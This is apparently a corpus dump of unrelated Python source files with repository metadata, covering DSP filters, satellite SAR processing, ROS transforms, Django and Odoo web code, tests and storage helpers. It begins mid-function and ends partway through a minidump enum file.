from the sequence 'population' according to the
list of weights
"""
sample = set()
population = list(population)
weights = list(weights)
while len(sample) < k:
choice = weighted_sample(population, weights)
sample.add(choice)
index = population.index(choice)
weights.pop(index)
population.remove(choice)
weights = [ x / sum(weights) for x in weights]
return list(sample)
def weighted_sample_alternative(population, weights, k):
"""
Alternative way to previous implementation.
This function draws a random sample of length k
from the sequence 'population' according to the
list of weights
"""
sample = set()
population = list(population)
weights = list(weights)
while len(sample) < k:
choice = weighted_sample(population, weights)
if choice not in sample:
sample.add(choice)
return list(sample)
amazons = ["Airla","Barbara","Eos",
"Glykeria","Hanna","Helen",
"Agathangelos","Iokaste","Medousa",
"Sofronia","Andromeda"]
weights = np.full(11,1/len(amazons))
Pytheusses_favorites = {"Iokaste","Medousa","Sofronia","Andromeda"}
n = 1000
counter = 0
prob= 1 / 330
days = 0
factor1 = 1 / 13
factor2 = 1 / 12
start = time.perf_counter()
while prob < 0.9:
for i in range(n):
the_chosen_ones = weighted_sample_alternative(amazons, weights, 4)
if set(the_chosen_ones) == Pytheusses_favorites:
counter += 1
prob = counter / n
counter = 0
weights[:7] = weights[:7] - weights[:7] * factor1
weights[7:] = weights[7:] + weights[7:] * factor2
weights = weights / np.sum(weights)
#print(weights)
days += 1
print(time.perf_counter() - start)
print("Number of days, he has to wait: ", days)
| 29.5625
| 83
| 0.643031
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,192
| 0.356481
|
0ce58d7de1508c5e2496368e37a432c416830c42
| 2,183
|
py
|
Python
|
lib_dsp/iir/iir/design/iir.py
|
PyGears/lib-dsp
|
a4c80882f5188799233dc9108f91faa4bab0ac57
|
[
"MIT"
] | 3
|
2019-08-26T17:32:33.000Z
|
2022-03-19T02:05:02.000Z
|
pygears_dsp/lib/iir.py
|
bogdanvuk/pygears-dsp
|
ca107d3f9e8d02023e9ccd27f7bc95f10b5aa995
|
[
"MIT"
] | null | null | null |
pygears_dsp/lib/iir.py
|
bogdanvuk/pygears-dsp
|
ca107d3f9e8d02023e9ccd27f7bc95f10b5aa995
|
[
"MIT"
] | 5
|
2019-09-18T18:00:13.000Z
|
2022-03-28T11:07:26.000Z
|
from pygears import gear, Intf
from pygears.lib import dreg, decouple, saturate, qround
@gear
def iir_1dsos(din, *, a, b, gain):
# add input gain and init delayed inputs
zu0 = din * gain
zu1 = zu0 | dreg(init=0)
zu2 = zu1 | dreg(init=0)
# perform b coefficient sum
a1 = (zu1 * b[1]) + (zu2 * b[2])
a2 = a1 + (zu0 * b[0])
# declare output interface and its type
y = Intf(a2.dtype)
# init delayed outputs
zy1 = y | decouple(init=0)
zy2 = zy1 | dreg(init=0)
# perform a coefficient sum
b1 = (zy2 * a[2]) + (zy1 * a[1])
# add both sums and set output
y |= (a2 - b1) | qround(fract=a2.dtype.fract) | saturate(t=a2.dtype)
return y
@gear
def iir_2tsos(din, *, a, b, gain):
# add input gain
x = din * gain
# declare output interface and its type
y = Intf(din.dtype)
# perform first tap multiplication and sum
z0 = ((x * b[2]) - (y * a[2]))
# delay first sum output
z0_delayed = z0 | dreg(init=0)
# perform second tap multiplication and sum
z1 = ((x * b[1]) + z0_delayed - (y * a[1]))
# delay second sum output
z1_delayed = z1 | decouple(init=0)
# perform final sum and set output
y |= ((x * b[0]) + z1_delayed) | qround(fract=din.dtype.fract) | saturate(t=din.dtype)
return y
@gear
def iir_df1dsos(din, *, a, b, gain, ogain):
# init temp
temp = din
# add cascades for all b coefficients
for i in range(len(b)):
# format every cascaded output as input
temp = temp | iir_1dsos(a=a[i], b=b[i], gain=gain[i]) | qround(fract=din.dtype.fract) | saturate(t=din.dtype)
# add output gain and format as input
dout = (temp * ogain) | qround(fract=din.dtype.fract) | saturate(t=din.dtype)
return dout
@gear
def iir_df2tsos(din, *, a, b, gain, ogain):
# init temp
temp = din
# add cascades for all b coefficients
for i in range(len(b)):
# format every cascaded output as input
temp = temp | iir_2tsos(a=a[i], b=b[i], gain=gain[i])
# add output gain and format as input
dout = (temp * ogain) | qround(fract=din.dtype.fract) | saturate(t=din.dtype)
return dout
| 24.255556
| 117
| 0.601466
| 0
| 0
| 0
| 0
| 2,083
| 0.954191
| 0
| 0
| 656
| 0.300504
|
0ce5cb9e4bc10393a6546a397038a2d745082f63
| 3,752
|
py
|
Python
|
read_iceye_h5.py
|
eciraci/iceye_gamma_proc
|
68b04bfd55082862f419031c28e7b52f1800f3db
|
[
"MIT"
] | null | null | null |
read_iceye_h5.py
|
eciraci/iceye_gamma_proc
|
68b04bfd55082862f419031c28e7b52f1800f3db
|
[
"MIT"
] | null | null | null |
read_iceye_h5.py
|
eciraci/iceye_gamma_proc
|
68b04bfd55082862f419031c28e7b52f1800f3db
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
u"""
read_iceye_h5.py
Written by Enrico Ciraci' (03/2022)
Read ICEYE Single Look Complex and Parameter file using GAMMA's Python
integration with the py_gamma module.
usage: read_iceye_h5.py [-h] [--directory DIRECTORY]
TEST: Read ICEye Single Look Complex and Parameter.
optional arguments:
-h, --help show this help message and exit
--directory DIRECTORY, -D DIRECTORY
Project data directory.
--slc SLC, -C SLC Process and single SLC.
PYTHON DEPENDENCIES:
argparse: Parser for command-line options, arguments and sub-commands
https://docs.python.org/3/library/argparse.html
datetime: Basic date and time types
https://docs.python.org/3/library/datetime.html#module-datetime
tqdm: Progress Bar in Python.
https://tqdm.github.io/
py_gamma: GAMMA's Python integration with the py_gamma module
UPDATE HISTORY:
"""
# - Python Dependencies
from __future__ import print_function
import os
import argparse
import datetime
from tqdm import tqdm
# - GAMMA's Python integration with the py_gamma module
import py_gamma as pg
# - Utility Function
from utils.make_dir import make_dir
def main():
parser = argparse.ArgumentParser(
description="""TEST: Read ICEye Single Look Complex and Parameter."""
)
# - Absolute Path to directory containing input data.
default_dir = os.path.join(os.path.expanduser('~'), 'Desktop',
'iceye_gamma_test')
parser.add_argument('--directory', '-D',
type=lambda p: os.path.abspath(os.path.expanduser(p)),
default=default_dir,
help='Project data directory.')
parser.add_argument('--slc', '-C', type=str,
default=None, help='Process and single SLC.')
args = parser.parse_args()
# - Path to Test directory
data_dir = os.path.join(args.directory, 'input')
# - create output directory
out_dir = make_dir(args.directory, 'output')
out_dir = make_dir(out_dir, 'slc+par')
# - ICEye Suffix
ieye_suff = 'ICEYE_X7_SLC_SM_'
if args.slc is not None:
# - Process a single SLC
b_input = os.path.join(data_dir, args.slc)
# - Read input Binary File Name
b_input_name = b_input.split('/')[-1].replace(ieye_suff, '')
slc_name = os.path.join(out_dir,
str(b_input_name.replace('.h5', '.slc')))
par_name = os.path.join(out_dir,
str(b_input_name.replace('.h5', '.par')))
# - Extract SLC and Parameter File
# - Set dtype equal to zero to save the SLC in FCOMPLEX format.
pg.par_ICEYE_SLC(b_input, par_name, slc_name, 0)
else:
# - Process hte entire input directory content
# - List Directory Content
data_dir_list = [os.path.join(data_dir, x) for x in os.listdir(data_dir)
if x.endswith('.h5')]
for b_input in tqdm(data_dir_list, total=len(data_dir_list), ncols=60):
# - Read input Binary File Name
b_input_name = b_input.split('/')[-1].replace(ieye_suff, '')
slc_name = os.path.join(out_dir, b_input_name.replace('.h5', '.slc'))
par_name = os.path.join(out_dir, b_input_name.replace('.h5', '.par'))
# - Extract SLC and Parameter File
# - Set dtype equal to zero to save the SLC in FCOMPLEX format.
pg.par_ICEYE_SLC(b_input, par_name, slc_name, 0)
# - run main program
if __name__ == '__main__':
start_time = datetime.datetime.now()
main()
end_time = datetime.datetime.now()
print(f"# - Computation Time: {end_time - start_time}")
| 36.076923
| 81
| 0.63033
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,848
| 0.492537
|
0ce5d95f10a05417cb3b6fc154c24d7adc27cf45
| 1,877
|
py
|
Python
|
scripts/baxter_find_tf.py
|
mkrizmancic/qlearn_baxter
|
0498315212cacb40334cbb97a858c6ba317f52a3
|
[
"MIT"
] | 4
|
2017-11-11T18:16:22.000Z
|
2018-11-08T13:31:09.000Z
|
scripts/baxter_find_tf.py
|
mkrizmancic/qlearn_baxter
|
0498315212cacb40334cbb97a858c6ba317f52a3
|
[
"MIT"
] | null | null | null |
scripts/baxter_find_tf.py
|
mkrizmancic/qlearn_baxter
|
0498315212cacb40334cbb97a858c6ba317f52a3
|
[
"MIT"
] | 2
|
2019-09-04T12:28:58.000Z
|
2021-09-27T13:02:48.000Z
|
#!/usr/bin/env python
"""Calculate transformation matrices and broadcast transform from robot's base to head markers."""
import rospy
import tf
import math
from PyKDL import Vector, Frame, Rotation
if __name__ == '__main__':
rospy.init_node('baxter_find_transformation')
listener = tf.TransformListener()
br = tf.TransformBroadcaster()
rate = rospy.Rate(50)
while not rospy.is_shutdown():
try:
(trans_OH, rot_OH) = listener.lookupTransform('/optitrack', '/bax_head', rospy.Time(0))
(trans_OA, rot_OA) = listener.lookupTransform('/optitrack', '/bax_arm', rospy.Time(0))
(trans_BG, rot_BG) = listener.lookupTransform('/base', '/left_gripper_base', rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
# Rotations
rot_OH = Rotation.Quaternion(*rot_OH)
rot_OA = Rotation.Quaternion(*rot_OA)
rot_BG = Rotation.Quaternion(*rot_BG)
rot_AG = Rotation.RPY(math.pi / 2, -math.pi, math.pi / 2)
# Creating Frames
T_OH = Frame(rot_OH, Vector(*trans_OH))
T_OA = Frame(rot_OA, Vector(*trans_OA))
T_BG = Frame(rot_BG, Vector(*trans_BG))
T_AG = Frame(rot_AG, Vector(0, 0, 0))
# Finding right transformation
T_HB = T_OH.Inverse() * T_OA * T_AG * T_BG.Inverse()
T_empty_p = Vector(0, 0, 0)
T_empty_Q = Rotation.Quaternion(0, 0, 0, 1)
T_empty = Frame(T_empty_Q, T_empty_p)
# Broadcast new transformations
br.sendTransform(T_HB.p, T_HB.M.GetQuaternion(), rospy.Time.now(), 'base', 'bax_head')
br.sendTransform(T_HB.p, T_HB.M.GetQuaternion(), rospy.Time.now(), 'reference/base', 'bax_head')
br.sendTransform(T_empty.p, T_empty.M.GetQuaternion(), rospy.Time.now(), 'world', 'base')
rate.sleep()
| 39.93617
| 104
| 0.64731
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 373
| 0.198721
|
0ce7201689d9142cf85fb513dc2bf55a86b13523
| 475
|
py
|
Python
|
car/migrations/0004_sale_cc.py
|
jobkarani/carnect
|
8675d025e56fc07439b88e873e72a21cbbe747a9
|
[
"MIT"
] | null | null | null |
car/migrations/0004_sale_cc.py
|
jobkarani/carnect
|
8675d025e56fc07439b88e873e72a21cbbe747a9
|
[
"MIT"
] | null | null | null |
car/migrations/0004_sale_cc.py
|
jobkarani/carnect
|
8675d025e56fc07439b88e873e72a21cbbe747a9
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.9 on 2022-01-10 12:39
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('car', '0003_auto_20220110_1507'),
]
operations = [
migrations.AddField(
model_name='sale',
name='cc',
field=models.CharField(default=django.utils.timezone.now, max_length=100),
preserve_default=False,
),
]
| 22.619048
| 86
| 0.621053
| 353
| 0.743158
| 0
| 0
| 0
| 0
| 0
| 0
| 87
| 0.183158
|
0ce7e95642a1dd2c0010de92c604aaf0452e7669
| 509
|
py
|
Python
|
src/prepare_data/task_prepare_r_effective_by_rki.py
|
covid-19-impact-lab/sid-germany
|
aef4bbfb326adaf9190c6d8880e15b3d6f150d28
|
[
"MIT"
] | 4
|
2021-04-24T14:43:47.000Z
|
2021-07-03T14:05:21.000Z
|
src/prepare_data/task_prepare_r_effective_by_rki.py
|
covid-19-impact-lab/sid-germany
|
aef4bbfb326adaf9190c6d8880e15b3d6f150d28
|
[
"MIT"
] | 4
|
2021-04-27T10:34:45.000Z
|
2021-08-31T16:40:28.000Z
|
src/prepare_data/task_prepare_r_effective_by_rki.py
|
covid-19-impact-lab/sid-germany
|
aef4bbfb326adaf9190c6d8880e15b3d6f150d28
|
[
"MIT"
] | null | null | null |
import pandas as pd
import pytask
from src.config import BLD
@pytask.mark.depends_on(BLD / "data" / "raw_time_series" / "reproduction_number.csv")
@pytask.mark.produces(BLD / "data" / "processed_time_series" / "r_effective.pkl")
def task_prepare_rki_r_effective_data(depends_on, produces):
df = pd.read_csv(depends_on)
df["date"] = pd.to_datetime(df["Datum"], yearfirst=True)
df = df.set_index("date").sort_index()
r_effective = df["PS_7_Tage_R_Wert"]
r_effective.to_pickle(produces)
| 29.941176
| 85
| 0.732809
| 0
| 0
| 0
| 0
| 444
| 0.872299
| 0
| 0
| 131
| 0.257367
|
0ce87ae6e8e21068ebe0de253baf4eb583ece22f
| 701
|
py
|
Python
|
conv.py
|
aenco9/HCAP2021
|
d194ba5eab7e361d67f6de3c62f9f17f896ebcf3
|
[
"MIT"
] | null | null | null |
conv.py
|
aenco9/HCAP2021
|
d194ba5eab7e361d67f6de3c62f9f17f896ebcf3
|
[
"MIT"
] | null | null | null |
conv.py
|
aenco9/HCAP2021
|
d194ba5eab7e361d67f6de3c62f9f17f896ebcf3
|
[
"MIT"
] | null | null | null |
import numpy as np
def convolucion(Ioriginal, kernel):
'''Método encargado de realizar una convolución a una imagen
Entrada:
Ioriginal - imagen original en forma de matríz
kernel - kernel para barrer la imagen
Salida:
res - imagen resultante'''
#fr - filas, cr - columnas
fr = len(Ioriginal)-(len(kernel)-1)
cr = len(Ioriginal[0])-(len(kernel[0])-1)
res = np.zeros((fr, cr))
#filas, matríz resultado
for i in range(len(res)):
#columnas, matríz resultado
for j in range(len(res[0])):
suma = 0
#filas, kernel
for m in range(len(kernel)):
#columnas, kernel
for n in range(len(kernel[0])):
suma += kernel[m][n] * Ioriginal[m+i][n+j]
res[i][j] = suma
return res
| 26.961538
| 61
| 0.664765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 308
| 0.436261
|
0ce8bde6ed2f1bdf025074aeab207999685d2edc
| 1,124
|
py
|
Python
|
setup.py
|
viatoriche/vtr_utils
|
d877a97eabf57246cd73e975da5c56d6a343bba4
|
[
"MIT"
] | null | null | null |
setup.py
|
viatoriche/vtr_utils
|
d877a97eabf57246cd73e975da5c56d6a343bba4
|
[
"MIT"
] | null | null | null |
setup.py
|
viatoriche/vtr_utils
|
d877a97eabf57246cd73e975da5c56d6a343bba4
|
[
"MIT"
] | null | null | null |
import os
from distutils.core import setup
from setuptools import find_packages
package = 'vtr_utils'
version = "0.1.0"
packages = find_packages()
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
setup(
name=package,
version=version,
packages=packages,
package_data=get_package_data(package),
license='MIT',
author='viatoriche',
author_email='maxim@via-net.org',
description='Small utilities',
url='https://github.com/viatoriche/vtr_utils',
download_url='https://github.com/viatoriche/vtr_utils/tarball/{}'.format(version),
install_requires=['addict', 'pytz', 'six', 'pyunpack', 'patool'],
)
| 28.820513
| 86
| 0.662811
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 314
| 0.279359
|
0ce945d91f14b7115bc5eeecc89a0cbddf6f0ae2
| 2,925
|
py
|
Python
|
radical_translations/agents/tests/test_models.py
|
kingsdigitallab/radical_translations
|
c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a
|
[
"MIT"
] | 3
|
2022-02-08T18:03:44.000Z
|
2022-03-18T18:10:43.000Z
|
radical_translations/agents/tests/test_models.py
|
kingsdigitallab/radical_translations
|
c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a
|
[
"MIT"
] | 19
|
2020-05-11T15:36:35.000Z
|
2022-02-08T11:26:40.000Z
|
radical_translations/agents/tests/test_models.py
|
kingsdigitallab/radical_translations
|
c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
import pytest
from radical_translations.agents.models import Organisation, Person
pytestmark = pytest.mark.django_db
@pytest.mark.usefixtures("vocabulary")
class TestOrganisation:
def test_agent_type(self, title):
obj = Person(name="person name")
obj.save()
assert obj.agent_type == "person"
obj = Organisation(name="organisation name")
obj.save()
assert obj.agent_type == "organisation"
def test_from_gsx_entry(self):
assert Organisation.from_gsx_entry(None) is None
entry = defaultdict(defaultdict)
entry["gsx$organisation"]["$t"] = ""
assert Organisation.from_gsx_entry(entry) is None
entry["gsx$organisation"]["$t"] = "Organisation 1"
assert Organisation.from_gsx_entry(entry) is not None
entry["gsx$type"]["$t"] = "Publisher"
assert Organisation.from_gsx_entry(entry) is not None
entry["gsx$location"]["$t"] = "0001: London [UK]"
assert Organisation.from_gsx_entry(entry) is not None
assert Organisation.objects.count() == 1
@pytest.mark.usefixtures("vocabulary")
class TestPerson:
def test_from_gsx_entry(self):
assert Person.from_gsx_entry(None) is None
entry = defaultdict(defaultdict)
entry["gsx$name"]["$t"] = ""
assert Person.from_gsx_entry(entry) is None
entry["gsx$name"]["$t"] = "Person 1"
assert Person.from_gsx_entry(entry) is not None
entry["gsx$gender"]["$t"] = "f"
p = Person.from_gsx_entry(entry)
assert p is not None
assert p.gender == "f"
entry["gsx$birth"]["$t"] = "1790"
p = Person.from_gsx_entry(entry)
assert p is not None
assert p.date_birth.date_display == "1790"
entry["gsx$locationsresidence"]["$t"] = "0001: London [UK]; 0002: Paris [FR]"
p = Person.from_gsx_entry(entry)
assert p is not None
assert "London" in p.based_near.first().address
assert "Paris" in p.based_near.last().address
entry["gsx$locationbirth"]["$t"] = "0001: London [UK]"
p = Person.from_gsx_entry(entry)
assert p is not None
assert "London" in p.place_birth.address
entry["gsx$locationdeath"]["$t"] = "0002: Paris [FR]"
p = Person.from_gsx_entry(entry)
assert p is not None
assert "Paris" in p.place_death.address
entry["gsx$occupations"]["$t"] = "tester"
p = Person.from_gsx_entry(entry)
assert p is not None
assert "tester" in p.roles.first().label.lower()
entry["gsx$organisations"]["$t"] = "Organisation 1"
p = Person.from_gsx_entry(entry)
assert p is not None
entry["gsx$collaborators"]["$t"] = "Person 2; Person 3"
p = Person.from_gsx_entry(entry)
assert p is not None
assert Person.objects.count() == 3
| 31.793478
| 85
| 0.624274
| 2,685
| 0.917949
| 0
| 0
| 2,763
| 0.944615
| 0
| 0
| 588
| 0.201026
|
0ce95b5923e81e3d937258cb29b18f328d097198
| 1,557
|
py
|
Python
|
addons/website_sale_coupon/controllers/main.py
|
SHIVJITH/Odoo_Machine_Test
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
[
"Apache-2.0"
] | null | null | null |
addons/website_sale_coupon/controllers/main.py
|
SHIVJITH/Odoo_Machine_Test
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
[
"Apache-2.0"
] | null | null | null |
addons/website_sale_coupon/controllers/main.py
|
SHIVJITH/Odoo_Machine_Test
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from odoo import http
from odoo.addons.website_sale.controllers.main import WebsiteSale
from odoo.http import request
class WebsiteSale(WebsiteSale):
@http.route(['/shop/pricelist'])
def pricelist(self, promo, **post):
order = request.website.sale_get_order()
coupon_status = request.env['sale.coupon.apply.code'].sudo().apply_coupon(order, promo)
if coupon_status.get('not_found'):
return super(WebsiteSale, self).pricelist(promo, **post)
elif coupon_status.get('error'):
request.session['error_promo_code'] = coupon_status['error']
return request.redirect(post.get('r', '/shop/cart'))
@http.route(['/shop/payment'], type='http', auth="public", website=True)
def payment(self, **post):
order = request.website.sale_get_order()
order.recompute_coupon_lines()
return super(WebsiteSale, self).payment(**post)
@http.route(['/shop/cart'], type='http', auth="public", website=True)
def cart(self, access_token=None, revive='', **post):
order = request.website.sale_get_order()
order.recompute_coupon_lines()
return super(WebsiteSale, self).cart(access_token=access_token, revive=revive, **post)
# Override
# Add in the rendering the free_shipping_line
def _get_shop_payment_values(self, order, **kwargs):
values = super(WebsiteSale, self)._get_shop_payment_values(order, **kwargs)
values['free_shipping_lines'] = order._get_free_shipping_lines()
return values
| 42.081081
| 95
| 0.680154
| 1,412
| 0.906872
| 0
| 0
| 1,061
| 0.681439
| 0
| 0
| 255
| 0.163776
|
0ce9ddf8982fdd13b64038e356850186f884758e
| 4,462
|
py
|
Python
|
go/apps/http_api/tests/test_views.py
|
lynnUg/vumi-go
|
852f906c46d5d26940bd6699f11488b73bbc3742
|
[
"BSD-3-Clause"
] | null | null | null |
go/apps/http_api/tests/test_views.py
|
lynnUg/vumi-go
|
852f906c46d5d26940bd6699f11488b73bbc3742
|
[
"BSD-3-Clause"
] | null | null | null |
go/apps/http_api/tests/test_views.py
|
lynnUg/vumi-go
|
852f906c46d5d26940bd6699f11488b73bbc3742
|
[
"BSD-3-Clause"
] | null | null | null |
from go.apps.tests.view_helpers import AppViewsHelper
from go.base.tests.helpers import GoDjangoTestCase
class TestHttpApiViews(GoDjangoTestCase):
def setUp(self):
self.app_helper = self.add_helper(AppViewsHelper(u'http_api'))
self.client = self.app_helper.get_client()
def test_show_stopped(self):
"""
Test showing the conversation
"""
conv_helper = self.app_helper.create_conversation_helper(
name=u"myconv")
response = self.client.get(conv_helper.get_view_url('show'))
self.assertContains(response, u"<h1>myconv</h1>")
def test_show_running(self):
"""
Test showing the conversation
"""
conv_helper = self.app_helper.create_conversation_helper(
name=u"myconv", started=True)
response = self.client.get(conv_helper.get_view_url('show'))
self.assertContains(response, u"<h1>myconv</h1>")
def test_edit_view(self):
conv_helper = self.app_helper.create_conversation_helper()
conversation = conv_helper.get_conversation()
self.assertEqual(conversation.config, {})
response = self.client.post(conv_helper.get_view_url('edit'), {
'http_api-api_tokens': 'token',
'http_api-push_message_url': 'http://messages/',
'http_api-push_event_url': 'http://events/',
'http_api-metric_store': 'foo_metric_store',
}, follow=True)
self.assertRedirects(response, conv_helper.get_view_url('show'))
reloaded_conv = conv_helper.get_conversation()
self.assertEqual(reloaded_conv.config, {
'http_api': {
'push_event_url': 'http://events/',
'push_message_url': 'http://messages/',
'api_tokens': ['token'],
'metric_store': 'foo_metric_store',
'ignore_events': False,
'ignore_messages': False,
}
})
def test_edit_view_no_event_url(self):
conv_helper = self.app_helper.create_conversation_helper()
conversation = conv_helper.get_conversation()
self.assertEqual(conversation.config, {})
response = self.client.post(conv_helper.get_view_url('edit'), {
'http_api-api_tokens': 'token',
'http_api-push_message_url': 'http://messages/',
'http_api-push_event_url': '',
'http_api-metric_store': 'foo_metric_store',
})
self.assertRedirects(response, conv_helper.get_view_url('show'))
reloaded_conv = conv_helper.get_conversation()
self.assertEqual(reloaded_conv.config, {
'http_api': {
'push_event_url': None,
'push_message_url': 'http://messages/',
'api_tokens': ['token'],
'metric_store': 'foo_metric_store',
'ignore_events': False,
'ignore_messages': False,
}
})
self.assertEqual(conversation.config, {})
response = self.client.get(conv_helper.get_view_url('edit'))
self.assertContains(response, 'http://messages/')
self.assertContains(response, 'foo_metric_store')
self.assertEqual(response.status_code, 200)
def test_edit_view_no_push_urls(self):
conv_helper = self.app_helper.create_conversation_helper()
conversation = conv_helper.get_conversation()
self.assertEqual(conversation.config, {})
response = self.client.post(conv_helper.get_view_url('edit'), {
'http_api-api_tokens': 'token',
'http_api-push_message_url': '',
'http_api-push_event_url': '',
'http_api-metric_store': 'foo_metric_store',
})
self.assertRedirects(response, conv_helper.get_view_url('show'))
reloaded_conv = conv_helper.get_conversation()
self.assertEqual(reloaded_conv.config, {
'http_api': {
'push_event_url': None,
'push_message_url': None,
'api_tokens': ['token'],
'metric_store': 'foo_metric_store',
'ignore_events': False,
'ignore_messages': False,
}
})
self.assertEqual(conversation.config, {})
response = self.client.get(conv_helper.get_view_url('edit'))
self.assertContains(response, 'foo_metric_store')
self.assertEqual(response.status_code, 200)
| 40.93578
| 72
| 0.61385
| 4,354
| 0.975796
| 0
| 0
| 0
| 0
| 0
| 0
| 1,139
| 0.255267
|
0ceb15471ca6941f1a3c2803a1bcd3575ac7f39e
| 5,306
|
py
|
Python
|
PyPowerStore/utils/helpers.py
|
dell/python-powerstore
|
04d6d73e4c926cf0d347cf68b24f8f11ff80f565
|
[
"Apache-2.0"
] | 15
|
2020-05-06T23:46:44.000Z
|
2021-12-14T08:04:48.000Z
|
PyPowerStore/utils/helpers.py
|
dell/python-powerstore
|
04d6d73e4c926cf0d347cf68b24f8f11ff80f565
|
[
"Apache-2.0"
] | 2
|
2020-06-09T15:19:25.000Z
|
2020-08-18T18:58:59.000Z
|
PyPowerStore/utils/helpers.py
|
dell/python-powerstore
|
04d6d73e4c926cf0d347cf68b24f8f11ff80f565
|
[
"Apache-2.0"
] | 5
|
2020-05-06T23:46:22.000Z
|
2021-05-08T03:03:07.000Z
|
# -*- coding: utf-8 -*-
# Copyright: (c) 2019-2021, Dell EMC
"""Helper module for PowerStore"""
import logging
from pkg_resources import parse_version
provisioning_obj = None
def set_provisioning_obj(val):
global provisioning_obj
provisioning_obj = val
def prepare_querystring(*query_arguments, **kw_query_arguments):
"""Prepare a querystring dict containing all query_arguments and
kw_query_arguments passed.
:return: Querystring dict.
:rtype: dict
"""
querystring = dict()
for argument_dict in query_arguments:
if isinstance(argument_dict, dict):
querystring.update(argument_dict)
querystring.update(kw_query_arguments)
return querystring
def get_logger(module_name, enable_log=False):
"""Return a logger with the specified name
:param module_name: Name of the module
:type module_name: str
:param enable_log: (optional) Whether to enable log or not
:type enable_log: bool
:return: Logger object
:rtype: logging.Logger
"""
LOG = logging.getLogger(module_name)
LOG.setLevel(logging.DEBUG)
if enable_log:
LOG.disabled = False
else:
LOG.disabled = True
return LOG
def is_foot_hill_or_higher():
"""Return a true if the array version is foot hill or higher.
:return: True if foot hill or higher
:rtype: bool
"""
foot_hill_version = '2.0.0.0'
array_version = provisioning_obj.get_array_version()
if array_version and (
parse_version(array_version) >= parse_version(foot_hill_version)):
return True
return False
def filtered_details(filterable_keys, filter_dict, resource_list,
resource_name):
"""
Get the filtered output.
:filterable_keys: Keys on which filters are supported.
:type filterable_keys: list
:filter_dict: Dict containing the filters, operators and value.
:type filter_dict: dict
:resource_list: The response of the REST api call on which
filter_dict is to be applied.
:type resource_list: list
:resource_name: Name of the resource
:type resource_name: str
:return: Dict, containing filtered values.
:rtype: dict
"""
err_msg = "Entered key {0} is not supported for filtering. " \
"For {1}, filters can be applied only on {2}. "
response = list()
for resource in resource_list:
count = 0
for key in filter_dict:
# Check if the filters can be applied on the key or not
if key not in filterable_keys:
raise Exception(err_msg.format(
key, resource_name, str(filterable_keys)))
count = apply_operators(filter_dict, key, resource, count)
if count == len(filter_dict):
temp_dict = dict()
temp_dict['id'] = resource['id']
# check if resource has 'name' parameter or not.
if resource_name not in ["CHAP config", "service config"]:
temp_dict['name'] = resource['name']
response.append(temp_dict)
return response
def apply_operators(filter_dict, key, resource, count):
"""
Returns the count for the filters applied on the keys
"""
split_list = filter_dict[key].split(".")
if split_list[0] == 'eq' and str(resource[key]) == str(split_list[1]):
count += 1
elif split_list[0] == 'neq' and str(resource[key]) != str(split_list[1]):
count += 1
elif split_list[0] == 'ilike':
if not isinstance(resource[key], str):
raise Exception('like can be applied on string type'
' parameters only. Please enter a valid operator'
' and parameter combination')
search_val = split_list[1].replace("*", "")
value = resource[key]
if split_list[1].startswith("*") and \
split_list[1].endswith("*") and \
value.count(search_val) > 0:
count += 1
elif split_list[1].startswith("*") and \
value.endswith(search_val):
count += 1
elif value.startswith(search_val):
count += 1
elif split_list[0] == 'gt':
if not isinstance(resource[key], (int, float)):
raise Exception('greater can be applied on int type'
' parameters only. Please enter a valid operator'
' and parameter combination')
if isinstance(resource[key], int) and\
int(split_list[1]) < resource[key]:
count += 1
if isinstance(resource[key], float) and \
float(split_list[1]) < resource[key]:
count += 1
elif split_list[0] == 'lt':
if not isinstance(resource[key], (int, float)):
raise Exception('lesser can be applied on int type'
' parameters only. Please enter a valid operator'
' and parameter combination')
if isinstance(resource[key], int) and\
int(split_list[1]) > resource[key]:
count += 1
if isinstance(resource[key], float) and \
float(split_list[1]) > resource[key]:
count += 1
return count
| 35.373333
| 78
| 0.602714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,848
| 0.348285
|
0ceb7ee6367f4094900b7a7ad37575ea6ba9548d
| 5,680
|
py
|
Python
|
minidump/streams/MiscInfoStream.py
|
lucasg/minidump
|
18474e3221038abe866256e4e0eb255e33615110
|
[
"MIT"
] | 1
|
2021-06-13T10:00:44.000Z
|
2021-06-13T10:00:44.000Z
|
minidump/streams/MiscInfoStream.py
|
lucasg/minidump
|
18474e3221038abe866256e4e0eb255e33615110
|
[
"MIT"
] | null | null | null |
minidump/streams/MiscInfoStream.py
|
lucasg/minidump
|
18474e3221038abe866256e4e0eb255e33615110
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
#
# Author:
# Tamas Jos (@skelsec)
#
import io
import enum
#https://msdn.microsoft.com/en-us/library/windows/desktop/ms680388(v=vs.85).aspx
class MinidumpMiscInfo2Flags1(enum.IntFlag):
MINIDUMP_MISC1_PROCESS_ID = 0x00000001 #ProcessId is used.
MINIDUMP_MISC1_PROCESS_TIMES = 0x00000002 #ProcessCreateTime, ProcessKernelTime, and ProcessUserTime are used.
MINIDUMP_MISC1_PROCESSOR_POWER_INFO = 0x00000004 #ProcessorMaxMhz, ProcessorCurrentMhz, ProcessorMhzLimit, ProcessorMaxIdleState, and ProcessorCurrentIdleState are used.
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms680389(v=vs.85).aspx
